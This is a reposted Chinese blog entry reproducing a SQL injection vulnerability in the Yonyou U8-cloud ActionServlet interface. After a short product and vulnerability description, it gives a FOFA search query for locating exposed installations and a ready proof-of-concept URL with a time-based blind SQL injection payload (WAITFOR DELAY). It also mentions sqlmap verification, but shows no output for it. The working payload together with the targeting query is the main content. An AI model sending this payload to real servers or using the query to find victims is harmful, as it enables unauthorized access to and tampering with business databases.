您的位置:首页 > 教育 > 培训 > 【漏洞复现】用友 U8-cloud ActionServlet sql注入漏洞

【漏洞复现】用友 U8-cloud ActionServlet sql注入漏洞

2024/11/14 12:41:39 来源:https://blog.csdn.net/weixin_45790890/article/details/142286564  浏览:    关键词:【漏洞复现】用友 U8-cloud ActionServlet sql注入漏洞

产品介绍

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

漏洞描述

用友 U8-cloud ActionServlet 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。

漏洞环境 

FOFA:

app="用友-U8-Cloud"

 

漏洞复现

PoC

/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-

sqlmap验证

 

 

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com